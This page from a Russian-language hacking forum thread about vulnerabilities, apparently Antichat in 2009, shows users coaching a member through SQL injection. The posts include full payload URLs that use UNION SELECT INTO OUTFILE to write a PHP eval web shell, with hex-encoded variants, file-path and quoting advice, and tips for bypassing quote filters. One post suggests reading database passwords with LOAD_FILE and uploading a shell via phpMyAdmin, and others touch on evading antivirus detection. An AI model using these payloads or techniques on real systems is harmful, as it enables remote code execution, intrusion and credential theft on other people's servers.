Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 249 of 1207
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Нет, путь нужен полный от корня, или если винда , то с диска. Ты-же на локалке тренируешься? Пробуй лить с такими ../../ путями, и с полными, потом поиском ищи куда залилось, и сам всё поймёшь
     
    #4961 Kakoytoxaker, 25 Jan 2009
    1 person likes this.
  2. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql‘])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'file://localhost/C:/shell.php'

    если все верно,шел доступен по адресу
    http://localhost/shell.php

    Я правильно понимаю?
    Запрос Верно составлен?
     
    #4962 kevmen, 25 Jan 2009
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Нет , Локальный путь, то что ты видишь в проводнике(или что там у тебя), а не в браузере. И доступен он будет там куда ты его положишь.

    Тоесть (например для денвера)
    http://localhost/ ------- это Z:\home\localhost\www\

    Льём
    INTO+OUTFILE+'Z:\home\localhost\www\shell.php'

    доступен:
    http://localhost/shell.php
     
    #4963 Kakoytoxaker, 25 Jan 2009
    2 people like this.
  4. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    l1ght

    нет не хочет почему то
     
    #4964 diznt, 25 Jan 2009
    1 person likes this.
  5. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    А можно объяснить, почему он так будет говорить? Что именно антивирусу не понравится? Я к примеру запускаю бат и не ругается, вношу изменения в реестр и тоже тишина :)
     
    #4965 Neponomat, 25 Jan 2009
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Каспер фиксирует даже минимальные изминения в системе,находит прогу,которой вызваны изменения и опредиляет её как вредоносную, иль трояна.
     
    #4966 -m0rgan-, 25 Jan 2009
  7. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ну а как можно сделать чтобы кнопка enter нажималась програмно? если можно поподробней :)
    и чеита у меня на каждое изменение в системе нпомалкивает нод 32??
     
    #4967 Neponomat, 25 Jan 2009
    Last edited: 25 Jan 2009
  8. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Neponomat а ключ /s не катит?)
     
    #4968 j0ker13, 25 Jan 2009
  9. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET['sql'])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'

    что-то опять не так делаю,может закодировать?
     
    #4969 kevmen, 25 Jan 2009
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.
     
    #4970 n0ne, 25 Jan 2009
  11. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    бесполезно,не получается
     
    #4971 kevmen, 25 Jan 2009
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Закодируй в 16битный формат вида 0xHEX_CODE...
     
    #4972 -m0rgan-, 25 Jan 2009
  13. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f4745545b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+0x5a3a5c7368656c6c2e706870

    тоже не помогает
     
    #4973 kevmen, 25 Jan 2009
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    INTO+OUTFILE+'Z:\shell.php' нельзя хексить..

    Пробуй:

    Code:
    http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f4745545b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'
     
    #4974 R1dex, 25 Jan 2009
    Last edited: 25 Jan 2009
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Убери с оутфайла хекс,если не поможет, значит вероятно фильтрация кавычек в запросе...
     
    #4975 -m0rgan-, 25 Jan 2009
  16. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f4745545b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'

    пробовал так,бесполезно все!
     
    #4976 kevmen, 25 Jan 2009
  17. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    'Z:\shell.php'
    вот это нужно как-то приподнести без кавычек)
     
    #4977 kevmen, 25 Jan 2009
  18. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Где то была инфа по обходу фильтрации кавычек, но будет она пахать в даном случае-хз...
     
    #4978 -m0rgan-, 25 Jan 2009
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Кавычки должны быть и обязательно "настоящими"
     
    #4979 R1dex, 25 Jan 2009
  20. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Если тебя интересует заливка шелла, то при наличии прав с помощью лоад файла можно узнать пассы от бд и попытатся залить шелл через пхпмайадмин...
     
    #4980 -m0rgan-, 25 Jan 2009
(You must log in or sign up to post here.)
Page 249 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.